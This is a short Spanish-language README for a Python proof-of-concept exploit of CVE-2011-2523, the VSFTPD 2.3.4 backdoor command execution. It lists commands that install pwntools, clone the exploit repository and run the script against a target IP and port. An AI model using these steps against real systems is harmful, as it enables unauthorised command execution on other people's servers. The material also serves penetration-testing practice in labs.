
Exploit en Python para CVE-2011-2523 (VSFTPD 2.3.4 Backdoor Command Execution)
Este es un script de python3 para explotar el CVE-2011-2523, la Ejecución de Comandos por Backdoor en VSFTPD 2.3.4, usando los módulos socket y telnetlib.

sudo python3 -m pip install pwntools
git clone https://github.com/4m3rr0r/CVE-2011-2523-poc.git
cd CVE-2011-2523-poc/
chmod +x exploit.py
./exploit.py -t IP -p Port